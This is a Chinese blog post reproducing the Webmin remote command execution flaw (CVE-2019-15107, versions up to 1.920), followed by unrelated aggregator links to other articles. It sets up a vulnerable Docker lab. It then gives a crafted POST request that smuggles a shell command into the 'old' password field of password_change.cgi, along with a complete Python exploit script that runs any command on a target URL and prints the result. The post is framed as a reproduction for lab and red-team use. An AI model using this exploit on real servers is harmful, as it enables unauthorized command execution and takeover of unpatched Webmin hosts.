weixin_30883311
weixin_30883311

Webmin代码执行漏洞复现

0x00 前言
之前由于hw,没得时间分析。这个webmin相信大家很多次都在内网扫到过。也是内网拿机器得分的一环。

0x01影响版本
Webmin<=1.920

0x02 环境搭建

建议大家以后用docker部署漏洞环境
docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba

 Webmin代码执行漏洞复现_第1张图片

访问127.0.0.1:10000
Webmin代码执行漏洞复现_第2张图片
使用账号密码:root/webmin登录到后台
开启密码重置功能:
Webmin--Webmin confuration—Authentication

Webmin代码执行漏洞复现_第3张图片

然后点击重启webmin。

0x03 漏洞利用
构造如下POST包请求:

POST /password_change.cgi HTTP/1.1
Host: 127.0.0.1:10000
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://127.0.0.1:10000/password_change.cgi/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
cache-control: no-cache

user=rootxx&pam=&expired=2&old=id&new1=test2&new2=test2

 


执行命令结果如下:

Webmin代码执行漏洞复现_第4张图片

 

python利用脚本如下:

#coding:utf-8
import requests
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# 禁用安全请求警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def exploit(url, shell):
    urls = url + "/password_change.cgi"
    headers = {
    'Accept-Encoding': "gzip, deflate",
    'Accept': "*/*",
    'Accept-Language': "en",
    'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    'Connection': "close",
    'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
    'Referer': "{}/session_login.cgi".format(urls),
    'Content-Type': "application/x-www-form-urlencoded",
    'Content-Length': "60",
    'cache-control': "no-cache"
    }
    # proxies = {
    #     "http": "http://127.0.0.1:8080"
    # }
    # don't need |
    payload="user=rootxx&pam=&expired=2&old={}&new1=test2&new2=test2".format(shell)
    r = requests.post(url=urls, headers=headers, data=payload, verify=False)
    #print(r.text)
    if r.status_code ==200 and "The current password is " in r.text :
        rs = re.compile(r"
Failed to change password : The current password is incorrect(.*)
",flags=re.DOTALL)
        result = rs.findall(r.text)
        #print(result)
        print ("Execute result:" + result[0])
    else:
        print ("No CVE-2019-15107!")


if __name__ == "__main__":
    url = sys.argv[1]
    shell = sys.argv[2]
    exploit(url, shell)

 

转载于:https://www.cnblogs.com/whoami101/p/11465877.html

你可能感兴趣的:(Webmin代码执行漏洞复现)

  • 有哪些适合大学生的学习编程经验? 编程就会这点技术
    学习编程可能没有捷径,但一定是有弯路的,按危害程度,依次为:不上机。死磕“经典”。玩鄙视链。“不上机”这个毛病我都不想多说了。不管你是看书还是看视频,正确的姿势都是左边翻开教科书,右边就同时打开电脑——把代码敲进去,把程序跑起来啊!在书上画叉叉圈圈有个毛用!?我觉得特别到位的一句话:编程本质上是门手艺。三天不练手生,手艺是练出来的。你当然要看书,但绝对不是只看书就够了。自己上机过个手,首先能发现问
  • C++中constexpr函数 棉猴 C++基础C++constexpr函数errorC3256errorC2131errorC3250
    1简介constexpr函数指的是在编译的时候就能得到其返回值的函数,也就是说编译器将constexpr函数直接转换成其返回值,因此,constexpr函数都是被隐式地定义为内联函数。使用constexpr关键字来修饰constexpr函数。2使用方法有如下代码:constexpr int myFunc(){return 1;}constexpr int i=myFunc()*4;此时,编译器会将
  • C++ 编译链接机制的演化路径 我家大宝最可爱 c++java算法
    以完全问题驱动的方式推导C++编译链接机制的演化路径。每一步都基于前一阶段无法解决的问题,提出新的设计方案,不依赖当前GCC或MSVC的实现细节,而是像一个架构师一样,从零开始设计一个现代C++系统。第一版(V1):一切都在main.cpp中✅初始方案:所有函数、变量、代码都写在main.cpp中。//main.cppintadd(inta,intb){returna+b;}intmultiply
  • 华为OD机试2025B卷真题题库目录|机考题库 + 算法考点详解(Python/JS/C/C++)
    专栏导读本专栏收录于《华为OD机试真题(Python/JS/C/C++)》。刷的越多,抽中的概率越大,私信哪吒,备注华为OD,加入华为OD刷题交流群,每一题都有详细的答题思路、详细的代码注释、3个测试用例、为什么这道题采用XX算法、XX算法的适用场景,发现新题目,随时更新。2025年5月12日,华为官方已经将华为OD机试(A卷)切换为B卷。目前正在考的是B卷,按照华为OD往常的操作,B卷题目是由往
  • Dev-C++——winAPI贪吃蛇小游戏 雾狩 c++开发语言
    欢迎互三:雾狩关注博主,后期持续更新系列文章如果有错误感谢请大家批评指出,及时修改感谢大家点赞收藏⭐评论✍今天水一篇吧……老样子,先上效果一、概述本文将对“登录+贪吃蛇”游戏的代码进行详细剖析。该游戏实现了用户登录和注册功能,同时包含经典的贪吃蛇游戏玩法,还支持游戏存档和加载功能。代码使用了C++语言,并结合了Windows操作系统的API函数,以实现窗口化的游戏界面和多媒体功能。二、代码结构与功
  • Python Preview 插件使用教程 汤涌双
    PythonPreview插件使用教程1.项目介绍PythonPreview是一个适用于VisualStudioCode(VSCode)的扩展插件,旨在为Python代码提供调试预览支持。该插件允许用户在编辑器中直接预览Python代码的执行结果,从而提高开发效率和代码可读性。PythonPreview插件由dongli开发,当前版本为0.0.4。2.项目快速启动安装步骤打开VSCode。进入扩展
  • 时间轮算法
    据说是复杂度O(1)的牛逼算法,所以抽时间学习学习。现在要实现一个定时器,这个定时器控制很多任务。该怎么做呢?第一反应是任务做成一个队列,属性有个时间,每次计时后将该属性减1,到0的时候就执行。这种方式可行,但是效率不高,因为每次都要遍历所有任务,所以时间复杂度是O(N)。优化的方法是什么呢?有点类似哈希表,增加一个时间队列,同时将任务预先排放在一个时间队列中。如果是100秒的时间范围,那么就是1
  • 【Java-多线程】i++ 是线程安全的吗? Java自学之旅 大白话说Javajava安全开发语言
    i++不是线程安全的操作。这个问题涉及Java内存模型、原子性操作、线程同步等核心概念,让我们通过一个银行账户的故事来理解:故事场景:银行金库争夺战假设银行金库有100元现金,两个柜员(线程)同时执行以下操作:publicvoidwithdraw(){if(balance>0){//1.读取余额balance--;//2.修改余额}}灾难现场(线程不安全)线程A读取余额100线程B同时读取余额10
  • 【代码】Matlab鸟瞰图函数
    用matlab把图像转化为鸟瞰图代码clcclearcloseallI=imread('road.png');figure(1)imshow(I)bevSensor=load('birdsEyeConfig');birdsEyeImage=transformImage(bevSensor.birdsEyeConfig,I);figure(2)imshow(birdsEyeImage)效果
  • 每日面试题08:wait()和sleep()的区别
    Java多线程核心:wait()与sleep()的区别与应用场景详解在Java多线程编程中,wait()和sleep()是两个控制线程执行流程的重要方法,但它们的设计定位和使用场景截然不同。本文将从底层机制、调用条件、锁行为、异常处理等维度深入解析两者的差异,并结合实际场景说明如何选择使用。一、前置知识:线程的状态与同步机制在理解wait()和sleep()前,需要明确两个基础概念:线程状态:Ja
  • C++ 使用 constexpr 、查表法、分治法加速位镜像翻转
    代码//////@brief左右翻转位。//////@note翻转后,最低位位将变为最高位,最高位将变为最低位。//////templaterequires(std::is_same_v)constexprTReverse(Tvalue){int32_tbit_count=sizeof(T)*8;for(int32_ti=0;irequires(std::is_integral_v&&!std::
  • Prompts
    提示是引导AI模型生成特定输出的输入。这些提示的设计和措辞会显著影响模型的反应。在SpringAI中与AI模型交互的最低级别,处理SpringAI中的提示与管理SpringMVC中的“视图”有些相似。这涉及为动态内容创建带有占位符的广泛文本。然后根据用户请求或应用程序中的其他代码替换这些占位符。另一个类比是包含某些表达式占位符的SQL语句。随着SpringAI的发展,它将为与AI模型的交互引入更高
  • 3136. 有效单词 咔咔咔的 c++
    3136.有效单词题目链接:3136.有效单词代码如下:classSolution{public:boolisValid(stringword){if(word.size()='a'&&c='A'&&c='0'&&c='b'&&c='B'&&c<='Z')){consonantCnt++;//统计辅音字符}continue;//忽略字母和数字}returnfalse;//如果有其他字符,返回fal
  • 2163. 删除元素后和的最小差值 咔咔咔的 leetcodec++
    2163.删除元素后和的最小差值题目链接:2163.删除元素后和的最小差值代码如下://参考链接:https://leetcode.cn/problems/minimum-difference-in-sums-after-removal-of-elements/solutions/1247074/qian-zhui-zui-xiao-he-hou-zhui-zui-da-he-yz3dclassS
  • 微信小程序 - 超详细 TDesign 组件库环境搭建,微信小程序项目开发中引入并使用 tdesign 组件库的详细教程(腾讯 TDesign 组件库与微信小程序开发) 前端开发大师鸭 +Wechat微信小程序tdesign小程序安装tdesign组件库tdesign组件库官方文档腾讯TDesign官方使用教程使用组件没有任何样式就一段字html放上去没有效果怎么办
    前言网上几乎没有教程,本文提供优质教程保证搞定。在微信小程序开发中,详解小程序TDesign组件库环境搭建与使用教程,完整安装及配置流程,项目引入使用tdesign组件示例代码,解决安装失败、安装报错、使用组件不显示、配置好了但使用没反应、无组件样式等问题,提供详细配置教程和组件的使用实例。小程序vue2|vue3版本语法都能使用,跟着教程安装集成即可。如下图所示,详细安装配置及引入使用,解决各种
  • 启新教育趣辅导02052100315 罗子杰感悟 庭院深深深几许_0e69
    【关键词】能够决策1.正如是人体的决策者、指挥部是军队的决策者一样,每一个行动在执行之前都需要一个决策者,小到家务,大到公司项目乃至国家事务。没有一个决策者,整个行动便无法正常进行。由于我们每个人扮演的角色多种多样,每个人都一定会在某个行动中成为决策者。因此,学会如何决策很有必要!2.文章中告诉我们四种决策方式,即命令式、顾问式、投票式和共识式,并且需要具体问题,具体分析,根据实际情况的不同选择不
  • 关于Ajax的学习笔记 秋也凉 ajax学习笔记
    Ajax概念:是一门使用了js语言,可以使用于Javaweb,实现前端代码和后端代码连结的的一种异步同步(不需要等待服务器相应,就能够发送第二次请求)的一种技术,它主要用于网页内容的局部刷新,列如验证码、导航栏的刷新等。实现步骤1.导入jQuery(一种框架,Ajax是JQuery的一种方法)文件——例如:写在jsp页面的标签里面。2.在jsp页面写一个函数,然后在函数里面调用ajax方法,aja
  • 【杂记】SQLAlchemy使用方法记录
    目录写在前面1.什么是SQLAlchemy2.安装SQLAlchemy3.使用方法3.1初始化数据库连接3.2创建表3.2.1基础创建表操作3.2.2常用表字段属性代码3.2.3建立数据库表关系(1)一对多(2)多对多3.3查询数据3.3.1通用的查询数据方法3.3.2过滤规则3.4向数据表中添加/删除/更改数据3.4.1添加数据3.4.2删除数据3.4.3更改数据参考写在前面仅作个人学习与记录用
  • 论文阅读:LLaVA1.5:Improved Baselines with Visual Instruction Tuning 微风❤水墨 LLM&AIGC&VLPLLM
    论文:https://arxiv.org/abs/2310.03744代码:https://github.com/haotian-liu/LLaVA#train微调:https://github.com/haotian-liu/LLaVA/blob/main/docs/Finetune_Custom_Data.md模型论文时间VisionEncoderVLAdapterProjectionLaye
  • 复盘关于周三晚上的分享 cdd2f75330c6
    记录:第一位李李:自我介绍11组长,30而立,复盘100天;复盘过程:三阶段。一是学习阶段,最有感触的事;二是分类阶段,时间管理,输入提升,生活感悟;三是全面复盘,记录和反思生活,总结:反思不到位,执行不够,需要阶段性复盘,重要的两点:输入和阶段复盘;复盘的结果是:1思维逻辑提升2学习能力提升,3目标清晰;第二位小路:自我介绍_宝妈,92天复盘,硬本领修炼演讲和理财;为何加复盘群_养习惯,提升逻辑
  • 微信小程序集成 TDesign PP0897 微信小程序tdesign小程序
    步骤1:在小程序控制台执行,一直按回车直至package.json创建好yarninit步骤2:yarnaddtdesign-miniprogram--production步骤3:将app.json中的"style":"v2"移除。步骤4:将app.json中的"renderer"修改为"webview"。
  • HUELOJ:137 字符串转换 一粒沙白猫 HUEL-OJ算法c语言
    题目描述输入一个以回车结束的字符串,它由数字和字母组成,请过滤掉所有非数字字符,然后将数字字符串转换成十进制整数后乘以2输出。输入描述输入一个以回车结束的字符串,长度不超过100,由数字和字母组成。输出描述将转换后的整数乘以2输出,测试数据保证结果在int范围内。输入样例sg987aa65t498输出样例197530996代码#include#include#includeintmain(){ch
  • 2022-02-28 一个人的日记0
    今日跑步5公里感谢董老师分享语言伤害指数5行动指数0做一个最勤奋情绪稳定脚踏实地极致做事的人多赞美多鼓励多表扬不批评不抱怨不指责不确定不要求不对比不急躁不人生攻击日计划执行做总结25分钟分割时间今天我最伟大明天我最好看拜师全身心的信任目标不可能失败计划不要脸学会展示干就完了从善思考
  • git 介绍与使用教程 叶楊 基础知识gitlab
    Git是一个分布式版本控制系统,每个开发者都有一个完整的本地仓库(包含完整历史记录),而远程仓库(如GitHub、GitLab、Gitee)是团队共享的中央仓库。它们的关系如下:本地仓库(LocalRepository)存储在你的计算机上,包含完整的提交历史、分支和代码。你可以独立进行提交(gitcommit)、创建分支(gitbranch)等操作,无需联网。远程仓库(RemoteReposito
  • python学习打卡:DAY 18 推断聚类后簇的类型 西西西仓鼠 python训练营python学习聚类
    @浙大疏锦行聚类后的分析:推断簇的类型知识点回顾:推断簇含义的2个思路:先选特征和后选特征通过可视化图形借助ai定义簇的含义科研逻辑闭环:通过精度判断特征工程价值作业:参考示例代码对心脏病数据集采取类似操作,并且评估特征工程后模型效果有无提升。在聚类分析中,推断簇的类型是理解数据内在结构和业务意义的关键步骤。以下是系统化的推断方法及常见簇类型的总结:一、簇的基本类型明显分离的簇特征:不同簇中任意两
  • python 协程进阶 cliffordl asyncpythonpython开发语言
    python协程实现python协程进阶python生成器的作用协程在多个模型流式输出中的使用实例文章目录1.协程基础1.1.协程名词解释1.2.基本工作流程1.3.async协程执行1.3.1.协程顺序执行(asyncio.run)1.3.2.协程顺序执行(await)1.3.3.协程同步执行(asyncio.create_task)2.可等待对象(Awaitables)2.1.Coroutin
  • Android编译系统——Kati执行过程(十一) c小旭 android系统编译
    在Android构建系统中,SoongUI是Soong构建框架的入口点。通过前面的学习我们知道,在执行make兼容模式编译时,soong_ui会调用ckati来将传统的Android.mk和其他Makefile文件转换为Ninja构建文件(如build-aosp_arm.ninja和build-aosp_arm-package.ninja)。这些.ninja文件随后会被ninja工具调用以进行真正
  • Python实现动态加载模块的方法 后端架构魔法构筑者 Python
    在Python中,动态加载模块是一种常见的技术,它允许我们在运行时根据需要加载和使用模块,而不是在程序启动时就将所有模块都导入。这种方式可以提高程序的灵活性和性能。下面我将详细介绍几种实现动态加载模块的方法,并提供相应的源代码示例。使用importlib模块importlib是Python的一个内置模块,它提供了一些函数来实现动态加载模块。下面是一个简单的示例:importimportlibdef
  • 智能体学习记录 一 罗同学213 学习
    智能体是什么智能体(IntelligentAgent)是一种能够感知周围环境、自主决策并执行行动以实现特定目标的智能化系统或程序。它可以是软件(如聊天机器人)、硬件(如机器人),或两者结合的实体,核心特征包括:自主性:无需人工实时干预,独立运行(如自动驾驶车辆避障)。反应性:实时感知环境变化并快速响应(如智能家居调节温度)。目标导向:基于预设目标优化行动(如推荐系统最大化用户点击率)。学习能力:通
  • 【设计模式&C#】工厂方法模式(相比简单工厂模式更加具有灵活性和扩展性的工厂模式)
    是一种创建型设计模式。特点是解耦客户端对对象的创建,使用抽象的工厂类,让类的扩展更加容易,相比简单工厂模式更具有灵活性和扩展性。优点:工厂方法模式将对象的创建与使用分开,使客户端代码无需关心对象是如何创建的;扩展性强,且符合开闭原则。需要添加新的实现类时,无需修改原有代码,只需添加一个相应的工厂类即可;支持多态,在运行时子类可以被替换,从而支持多态编程;易于修改和维护;易于管理复杂的创建逻辑。缺点
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他